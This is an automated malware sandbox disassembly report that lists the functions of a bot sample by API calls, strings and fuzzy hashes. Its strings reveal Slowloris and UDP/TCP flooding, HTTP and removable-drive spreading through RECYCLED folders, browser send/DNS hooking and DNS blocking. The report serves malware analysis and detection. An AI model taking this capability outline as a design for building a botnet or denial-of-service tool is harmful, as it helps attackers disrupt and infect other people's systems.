                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$Allocstrstr$Freelstrcpyn
                                                                  • String ID:
                                                                  • API String ID: 1314289781-2344752452
                                                                  • Opcode ID: 5aa0ff57d6fe46b096632792f5a0ed9b5515c6a37e2db427a6458201d3eb1f67
                                                                  • Instruction ID: fbeb5a47e911f541656ddf0a57f798140b687dd9417f9ff34d287545a7c58110
                                                                  • Opcode Fuzzy Hash: 5aa0ff57d6fe46b096632792f5a0ed9b5515c6a37e2db427a6458201d3eb1f67
                                                                  • Instruction Fuzzy Hash: 81117373A01354BBD721ABA69C85FEB77ACEF45711F014115FA04E7391DAB4EE0087A0
                                                                  Function 003DAC00 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 82memorynetworkstringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000,?,00000000,?), ref: 003DAC1A
                                                                  • HttpQueryInfoW.WININET(?,8000002D,00000000,?,?), ref: 003DAC3E
                                                                  • GetLastError.KERNEL32 ref: 003DAC44
                                                                  • HeapReAlloc.KERNEL32(?,00000008,00000000,?), ref: 003DAC5E
                                                                  • HttpQueryInfoW.WININET(?,8000002D,00000000,?,?), ref: 003DAC79
                                                                  • lstrcmpW.KERNEL32(POST,00000000), ref: 003DAC85
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003DAC99
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003DACB2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocFreeHttpInfoQuery$ErrorLastlstrcmp
                                                                  • String ID: POST
                                                                  • API String ID: 770645459-1814004025
                                                                  • Opcode ID: 9f32966a84bc3067a9cee64dbdb1bd6b12d7d86d74a2374e3787de0cacefdc9c
                                                                  • Instruction ID: a268d30b40438a05b09b9f0d5229074b0a280b4f4c47bd6ddb00dedfcf023351
                                                                  • Opcode Fuzzy Hash: 9f32966a84bc3067a9cee64dbdb1bd6b12d7d86d74a2374e3787de0cacefdc9c
                                                                  • Instruction Fuzzy Hash: D2219376611614BBD7329BA5AD88EFF7B7CEB85761F104259FA04D7280D6309D00C7A1
                                                                  Function 003DA690 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 79processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000206), ref: 003DA6AF
                                                                  • memset.MSVCRT(?,00000000,00000616,?,00000000,00000206), ref: 003DA6CA
                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000026,00000000), ref: 003DA6DF
                                                                  • PathAppendW.SHLWAPI(?,Internet Explorer\iexplore.exe), ref: 003DA6F9
                                                                  • _snwprintf.MSVCRT(?,00000617,"%s" %S,?,?), ref: 003DA71B
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000010,00000000,00000000,00000044,?), ref: 003DA77F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Pathmemset$AppendCreateFolderProcessSpecial_snwprintf
                                                                  • String ID: "%s" %S$D$Internet Explorer\iexplore.exe
                                                                  • API String ID: 1165436438-694066683
                                                                  • Opcode ID: 77819245ca30d7a5291dc6bd017cb7e55881aadd794e0b612f742fd5ecffdcb8
                                                                  • Instruction ID: 0e1beb13de400c3eb8a6067eadd20a839d72454f3c45ae41791e02d85d31753d
                                                                  • Opcode Fuzzy Hash: 77819245ca30d7a5291dc6bd017cb7e55881aadd794e0b612f742fd5ecffdcb8
                                                                  • Instruction Fuzzy Hash: 8821BB71940308BAEB21DBE0DC46FEE7378AF44B00F144685F6096E1C0EBF19E448B99
                                                                  Function 003D9430 Relevance: 15.1, APIs: 10, Instructions: 109networksleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 003D9300: inet_addr.WS2_32(n"=), ref: 003D9308
                                                                    • Part of subcall function 003D9300: gethostbyname.WS2_32(n"=), ref: 003D9313
                                                                  • GetTickCount.KERNEL32 ref: 003D9467
                                                                  • htons.WS2_32(?), ref: 003D9490
                                                                  • GetTickCount.KERNEL32(?), ref: 003D94BD
                                                                  • GetTickCount.KERNEL32 ref: 003D94C1
                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 003D94F6
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 003D9511
                                                                  • sendto.WS2_32(?,?,00001964,00000000,00000002,00000010), ref: 003D953C
                                                                  • Sleep.KERNEL32(00000064,00000002,00000002,00000011), ref: 003D9549
                                                                  • closesocket.WS2_32(?), ref: 003D9559
                                                                  • GetTickCount.KERNEL32(?), ref: 003D9564
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Sleepclosesocketgethostbynamehtonsinet_addrioctlsocketsendtosocket
                                                                  • String ID:
                                                                  • API String ID: 2400900511-0
                                                                  • Opcode ID: 3d54589e553061f67ed33b157dc459d3801781e68a48489d56a9ebf71df76441
                                                                  • Instruction ID: 85e521eea913e2dae0f855e9555ea0f0194ed33284f2adc0836125a5d54e35c9
                                                                  • Opcode Fuzzy Hash: 3d54589e553061f67ed33b157dc459d3801781e68a48489d56a9ebf71df76441
                                                                  • Instruction Fuzzy Hash: 52313A739001745BD722EBF9A846BAEB2A99F85304F020633F905EB3C1C5B08D0187A2
                                                                  Function 003DACD0 Relevance: 15.1, APIs: 10, Instructions: 107memorynetworkstringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000103,?,00000000,?), ref: 003DACF5
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000,?,00000000,?), ref: 003DAD0A
                                                                  • InternetQueryOptionW.WININET(?,00000022,00000000,?), ref: 003DAD2B
                                                                  • GetLastError.KERNEL32 ref: 003DAD31
                                                                  • HeapReAlloc.KERNEL32(?,00000008,00000000,?), ref: 003DAD4F
                                                                  • InternetQueryOptionW.WININET(?,00000022,00000000,?), ref: 003DAD63
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000104,00000000,00000000), ref: 003DAD80
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 003DAD93
                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 003DADB3
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003DADE6
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocInternetOptionQuery$??2@ByteCharErrorFreeLastMultiWidelstrcpymemset
                                                                  • String ID:
                                                                  • API String ID: 3155763378-0
                                                                  • Opcode ID: df8065c42b128f2fd9b96521b34f86d1f4ce45ae0236ff98a70b007096d37a7f
                                                                  • Instruction ID: 3dbc74ab238b4b08913de771d38ee90e81bdf1d9b93d66b54c7c1ad8f77c744b
                                                                  • Opcode Fuzzy Hash: df8065c42b128f2fd9b96521b34f86d1f4ce45ae0236ff98a70b007096d37a7f
                                                                  • Instruction Fuzzy Hash: 9731AF75500354BBD7229B95DC85FAA7BBCEB8A711F104245FA049B2C0D7B09E40CBA1
                                                                  Function 003D9330 Relevance: 15.1, APIs: 10, Instructions: 81networksleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 003D9300: inet_addr.WS2_32(n"=), ref: 003D9308
                                                                    • Part of subcall function 003D9300: gethostbyname.WS2_32(n"=), ref: 003D9313
                                                                  • htons.WS2_32(?), ref: 003D935D
                                                                  • GetTickCount.KERNEL32(?), ref: 003D936F
                                                                  • GetTickCount.KERNEL32 ref: 003D9373
                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 003D93A6
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 003D93C1
                                                                  • connect.WS2_32(?,?,00000010), ref: 003D93DE
                                                                  • Sleep.KERNEL32(00000064,?,?,00000010,00000002,00000001,00000000), ref: 003D93EB
                                                                  • closesocket.WS2_32(?), ref: 003D93F8
                                                                  • Sleep.KERNEL32(0000004B,?), ref: 003D9405
                                                                  • GetTickCount.KERNEL32 ref: 003D9407
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Sleep$closesocketconnectgethostbynamehtonsinet_addrioctlsocketsocket
                                                                  • String ID:
                                                                  • API String ID: 1090714710-0
                                                                  • Opcode ID: b2b0ca089be2a68618063d439e3dcc4854f75b49a776f0f8fec6807d43d2bf8a
                                                                  • Instruction ID: 0ad26b93ee245691003d0d805d80739b538ba71f3f4b9ef6a6d5f765b8096007
                                                                  • Opcode Fuzzy Hash: b2b0ca089be2a68618063d439e3dcc4854f75b49a776f0f8fec6807d43d2bf8a
                                                                  • Instruction Fuzzy Hash: 8021C7739002256BD721FBB9AD85B9EB3699B84310F124727E918FB2C1D6B09D41CBD1
                                                                  Function 003DFC90 Relevance: 15.1, APIs: 7, Strings: 3, Instructions: 57stringsleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003DFCB0
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 003DFCBD
                                                                  • _snprintf.MSVCRT(?,00000103,%0x.exe,00000000,30e44aa1,00000000), ref: 003DFCE0
                                                                  • lstrcpyW.KERNEL32(0041B9A0,0041ADA0), ref: 003DFCF2
                                                                  • lstrcpyA.KERNEL32(0041BDB0,RECYCLED), ref: 003DFD08
                                                                  • lstrcpyA.KERNEL32(0041BEB4,?), ref: 003DFD16
                                                                    • Part of subcall function 003DF9E0: memset.MSVCRT(?,00000000,000001FF), ref: 003DF9FF
                                                                    • Part of subcall function 003DF9E0: GetLogicalDriveStringsA.KERNEL32(000001FF,00000000), ref: 003DFA22
                                                                    • Part of subcall function 003DF9E0: lstrcatA.KERNEL32(00000000,003E3040), ref: 003DFA5C
                                                                  • Sleep.KERNEL32(00003A98), ref: 003DFD61
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpy$memset$DriveLogicalSleepStrings_snprintflstrcatlstrlen
                                                                  • String ID: %0x.exe$30e44aa1$RECYCLED
                                                                  • API String ID: 530497602-684435549
                                                                  • Opcode ID: 8473c6f7b583ab1595af5186c6203a0ea12624af75930793b82b7fbeddf7aa76
                                                                  • Instruction ID: 2f2fb493441fef0c949bbf23f97d5de1d68e114ccf96c13f022fe4325255511b
                                                                  • Opcode Fuzzy Hash: 8473c6f7b583ab1595af5186c6203a0ea12624af75930793b82b7fbeddf7aa76
                                                                  • Instruction Fuzzy Hash: 3A11C4B2940368AFD312AB65ACC2FD5776CE708704F40817BF644962D2C7F419C18FA9
                                                                  Function 003D5820 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 171sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000007FF,?,(m>), ref: 003D5844
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003D58B9
                                                                  • InterlockedCompareExchange.KERNEL32(00000000,00000000), ref: 003D5970
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003D5A05
                                                                    • Part of subcall function 003D49F0: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,756F59EB,?,003D73CC,00407C98,00000000,00000000,00000010,00000000), ref: 003D4A10
                                                                    • Part of subcall function 003D49F0: ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 003D4A77
                                                                  • Sleep.KERNEL32(00000001), ref: 003D59F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle$CompareExchangeInterlockedMutexObjectReleaseSingleSleepWaitmemset
                                                                  • String ID: (m>$.`=$STFU
                                                                  • API String ID: 1355865062-3008306076
                                                                  • Opcode ID: a1f39f6ac65c7e1a5b46391033606b31ec23884574eb49eadbf0e14a4f893803
                                                                  • Instruction ID: 312805df64010eafdb2e6a8308335d85996aed8fd038ceb2750016e659d1e37f
                                                                  • Opcode Fuzzy Hash: a1f39f6ac65c7e1a5b46391033606b31ec23884574eb49eadbf0e14a4f893803
                                                                  • Instruction Fuzzy Hash: 22519371E00215ABDB25DFA8DC45BAE77B8EB84710F14816AF945EB381EB749E40CB90
                                                                  Function 003D89B0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 144COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000034), ref: 003D89C5
                                                                  • AcquireCredentialsHandleW.SECUR32(00000000,Microsoft Unified Security Protocol Provider,00000002,00000000,?,00000000,00000000,?,00000000), ref: 003D8A32
                                                                  • QueryContextAttributesW.SECUR32(?,00000004,00000001), ref: 003D8AC3
                                                                  • InitializeSecurityContextW.SECUR32(?,00000000,?,0008C11C,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 003D8A79
                                                                    • Part of subcall function 003D8760: FreeContextBuffer.SECUR32(?), ref: 003D8774
                                                                    • Part of subcall function 003D8790: InitializeSecurityContextW.SECUR32(?,?,?,0008C11C,00000000,00000000,?,00000000,00000000,?,?,00000000), ref: 003D88AE
                                                                  • DeleteSecurityContext.SECUR32(?), ref: 003D8B17
                                                                  • FreeCredentialsHandle.SECUR32(?), ref: 003D8B1E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Context$Security$CredentialsFreeHandleInitialize$AcquireAttributesBufferDeleteQuerymemset
                                                                  • String ID: $Microsoft Unified Security Protocol Provider
                                                                  • API String ID: 3657786480-3891800672
                                                                  • Opcode ID: 00c07836cfea5094ea8f008ac63d367220df0194460e2728b98c946303383afa
                                                                  • Instruction ID: 8eefa13b26e6ae1f5f4339d88a06a9ac91e84c930739e8ad9e27283476182318
                                                                  • Opcode Fuzzy Hash: 00c07836cfea5094ea8f008ac63d367220df0194460e2728b98c946303383afa
                                                                  • Instruction Fuzzy Hash: 67511BB2D00248AFDB21DF9ADC859AFFBFCFF94700F10451AE515EA251E774AA058B60
                                                                  Function 003D1D10 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 112stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000003FE), ref: 003D1D31
                                                                  • memset.MSVCRT(?,00000000,000001FF,?,00000000,000003FE), ref: 003D1D4B
                                                                  • lstrcmpA.KERNEL32(00000000,block), ref: 003D1D9B
                                                                  • strstr.MSVCRT(00000000,003E13D8), ref: 003D1DAB
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000400), ref: 003D1DCA
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000200,00000000,00000000), ref: 003D1E0C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidememset$lstrcmpstrstr
                                                                  • String ID: bdns$block
                                                                  • API String ID: 1883446694-4143068083
                                                                  • Opcode ID: 96b0f9833b23568945f283e8d0d7d761f3155d274345234c36a1fd79abd4dd50
                                                                  • Instruction ID: d0c21aba3603271d3a88b52f30a1cbb60828cccb2971150786c0e6f21532859d
                                                                  • Opcode Fuzzy Hash: 96b0f9833b23568945f283e8d0d7d761f3155d274345234c36a1fd79abd4dd50
                                                                  • Instruction Fuzzy Hash: DA31F6B66403547BD732DA55AC46FFB737DDF84711F00425AFE14AA2C1EBB09A10C6A1
                                                                  Function 003D1000 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 59stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrcmpA.KERNEL32(?,0041AC50), ref: 003D100D
                                                                  • lstrcmpA.KERNEL32(?,0041AA28), ref: 003D1054
                                                                  • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 003D1062
                                                                  • lstrcpyA.KERNEL32(003E6D88,?), ref: 003D108B
                                                                  • lstrcpyA.KERNEL32(003E6E90,?), ref: 003D1093
                                                                    • Part of subcall function 003D7700: memset.MSVCRT(?,00000000,000001FF), ref: 003D771E
                                                                    • Part of subcall function 003D7700: _snprintf.MSVCRT(00000000,000001FF,state_%s,?,?,00000000,000001FF), ref: 003D7738
                                                                    • Part of subcall function 003D7700: lstrlenA.KERNEL32(00000000), ref: 003D7747
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmplstrcpy$FileMove_snprintflstrlenmemset
                                                                  • String ID: %s.%s$pdef$ruskill
                                                                  • API String ID: 4105673886-2574534833
                                                                  • Opcode ID: 04ebf2ac60e6c9650553d5f981466777b780c5a7806725296773c8068a19d348
                                                                  • Instruction ID: 231f158da22b1fc199dac8292a2c198f3243c52055c55416a5196d3938902b51
                                                                  • Opcode Fuzzy Hash: 04ebf2ac60e6c9650553d5f981466777b780c5a7806725296773c8068a19d348
                                                                  • Instruction Fuzzy Hash: A201F537340290B7C33367AABC86EEBB79CDF687A0B040116F608D5281D670D890C2B5
                                                                  Function 003D9C60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 81stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • strtok.MSVCRT(?,003E29EC), ref: 003D9C7C
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003D9C9A
                                                                  • lstrcpyA.KERNEL32(0041B648,003E1335), ref: 003D9CB3
                                                                  • lstrcpynA.KERNEL32(0041B648,00000000,00000200), ref: 003D9CC4
                                                                  • strtok.MSVCRT(00000000,003E29EC), ref: 003D9CDB
                                                                  • atoi.MSVCRT(00000000), ref: 003D9CE8
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003D9D73
                                                                  Strings
                                                                  • [Slowloris]: Starting flood on "%s" for %d minute(s), xrefs: 003D9CF9
                                                                  • [Slowloris]: Finished flood on "%s", xrefs: 003D9D45
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeapstrtok$atoilstrcpylstrcpyn
                                                                  • String ID: [Slowloris]: Finished flood on "%s"$[Slowloris]: Starting flood on "%s" for %d minute(s)
                                                                  • API String ID: 1726920797-1250431664
                                                                  • Opcode ID: 3f05cb43d14f2d3ebebb4978213ddc58f23265044b6fb651df73ae71fde8d0c0
                                                                  • Instruction ID: c265bde9434f26a13b1d3c8deae880ce6b0363c94b9df03b9186a70947223869
                                                                  • Opcode Fuzzy Hash: 3f05cb43d14f2d3ebebb4978213ddc58f23265044b6fb651df73ae71fde8d0c0
                                                                  • Instruction Fuzzy Hash: A02126732407946BD322ABE1FC86FEB379CE754705F10422AF6049A2D1C7B45850CBE5
                                                                  Function 003E0BB0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 80COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _stricmp.MSVCRT(?,GetAddrInfoW), ref: 003E0C14
                                                                  • _stricmp.MSVCRT(?,send), ref: 003E0C26
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: _stricmp
                                                                  • String ID: GetAddrInfoW$dnsapi.dll$nspr4.dll$send$wininet.dll
                                                                  • API String ID: 2884411883-3553644081
                                                                  • Opcode ID: 790f4b91fc9e9870806336c6398cf65237da3ccbdf481761b9d02a1dc27a5c9e
                                                                  • Instruction ID: 0f46f3d7070fe08e02f99f04fb2a3d4fdc4077aaa073616686eecfaefdf34ad0
                                                                  • Opcode Fuzzy Hash: 790f4b91fc9e9870806336c6398cf65237da3ccbdf481761b9d02a1dc27a5c9e
                                                                  • Instruction Fuzzy Hash: EF11C833F401B1519A2B52A77D02BEAA24C5B60762F060333FD0DDB3C1D5D1DAD081E2
                                                                  Function 003DC8C6 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,?,http.set,?,msn.int,?,003E57F4,?,003E57F0,?,speed,?,rs0,?,stats), ref: 003DC8DD
                                                                  • lstrlenA.KERNEL32(?,?,http.set,?,msn.int,?,003E57F4,?,003E57F0,?,speed,?,rs0,?,stats), ref: 003DC8E5
                                                                  • lstrcatA.KERNEL32(00000000,003E2C78,?,?,http.set,?,msn.int,?,003E57F4,?,003E57F0,?,speed,?,rs0), ref: 003DC907
                                                                  • lstrcatA.KERNEL32(00000000,?,?,?,http.set,?,msn.int,?,003E57F4,?,003E57F0,?,speed,?,rs0), ref: 003DC913
                                                                  • lstrcmpA.KERNEL32(00000000,http.int,?,http.set,?,msn.int,?,003E57F4,?,003E57F0,?,speed,?,rs0,?,stats), ref: 003DC985
                                                                  • atoi.MSVCRT(?,?,?,http.set,?,msn.int,?,003E57F4,?,003E57F0,?,speed,?,rs0,?,stats), ref: 003DC99C
                                                                  • atoi.MSVCRT(00000000), ref: 003DC9AF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: atoilstrcatlstrlen$lstrcmp
                                                                  • String ID: [HTTP]: Updated HTTP spread message to "%s"$http$msg
                                                                  • API String ID: 3861295430-3390247340
                                                                  • Opcode ID: b7cd8053e5152b442a70fed171692eb84d917e28c14c215736d3d590cab9e541
                                                                  • Instruction ID: 47e5ce13cc79fc499c87766042594b9f7a029b9f5f264c853ff8d4aa523b7b3b
                                                                  • Opcode Fuzzy Hash: b7cd8053e5152b442a70fed171692eb84d917e28c14c215736d3d590cab9e541
                                                                  • Instruction Fuzzy Hash: 8801C47691025D9EDB22DB60DC81EDBB37CAF44300F11058AE44997182DB70FA86CF61
                                                                  Function 003D3DB8 Relevance: 12.1, APIs: 8, Instructions: 108fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadFile.KERNEL32(?,-003E7960,00000800,00000000,?,?,?,00000000,000000FF), ref: 003D3DFF
                                                                  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 003D3E3E
                                                                  • ReadFile.KERNEL32(?,003E7960,00000800,00000000,?), ref: 003D3ED7
                                                                  • GetLastError.KERNEL32 ref: 003D3EE3
                                                                  • GetLastError.KERNEL32 ref: 003D3EEA
                                                                  • GetLastError.KERNEL32 ref: 003D3EF3
                                                                  • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 003D3F0D
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF), ref: 003D3F1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FileRead$MultipleObjectsOverlappedResultWait
                                                                  • String ID:
                                                                  • API String ID: 146293752-0
                                                                  • Opcode ID: 7dbdf45d5aaf146afbb0b1167dbfff8a1835e50c413952c15d5aca8ac7e10598
                                                                  • Instruction ID: 1fa9a656c4461f8fecb4723fdf920a5bf4a1d913cf5498310075ea994c1d480e
                                                                  • Opcode Fuzzy Hash: 7dbdf45d5aaf146afbb0b1167dbfff8a1835e50c413952c15d5aca8ac7e10598
                                                                  • Instruction Fuzzy Hash: E5418DB6604219EFD711CF68E8C4FAA77A8FF49304F408658E5469B385C731EE51CBA2
                                                                  Function 003D3DB6 Relevance: 12.1, APIs: 8, Instructions: 107fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadFile.KERNEL32(?,-003E7960,00000800,00000000,?,?,?,00000000,000000FF), ref: 003D3DFF
                                                                  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 003D3E3E
                                                                  • ReadFile.KERNEL32(?,003E7960,00000800,00000000,?), ref: 003D3ED7
                                                                  • GetLastError.KERNEL32 ref: 003D3EE3
                                                                  • GetLastError.KERNEL32 ref: 003D3EEA
                                                                  • GetLastError.KERNEL32 ref: 003D3EF3
                                                                  • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 003D3F0D
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF), ref: 003D3F1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FileRead$MultipleObjectsOverlappedResultWait
                                                                  • String ID:
                                                                  • API String ID: 146293752-0
                                                                  • Opcode ID: f98f24b07ae05d0e29b8a5bd9e05061e2d64751cc6deab154d9319fb8d854e7a
                                                                  • Instruction ID: 4fe6dabab8b0a800b8b411b691b0cede5d2012e179bf3dcaafc7c74de2e0a282
                                                                  • Opcode Fuzzy Hash: f98f24b07ae05d0e29b8a5bd9e05061e2d64751cc6deab154d9319fb8d854e7a
                                                                  • Instruction Fuzzy Hash: D3419DB6604219AFD711CF68E8C4FAA77A8FF49304F408658E5069B381C731EE01CBA2
                                                                  Function 003D7500 Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 99stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?), ref: 003D752B
                                                                  • _snprintf.MSVCRT(?,000001FF,%s_,?), ref: 003D7547
                                                                  • _vsnprintf.MSVCRT(?,000001FF,00000000,?), ref: 003D7569
                                                                  • lstrcmpA.KERNEL32(?,bdns), ref: 003D758B
                                                                  • StrStrIA.SHLWAPI(?,00000000), ref: 003D759F
                                                                  • lstrlenA.KERNEL32(?), ref: 003D75B9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$_snprintf_vsnprintflstrcmp
                                                                  • String ID: %s_$bdns
                                                                  • API String ID: 3897371274-741241040
                                                                  • Opcode ID: 726638a4f028c6ba6f7936c4ead4811d6733c4fe72510fbdea1a5c505a67353c
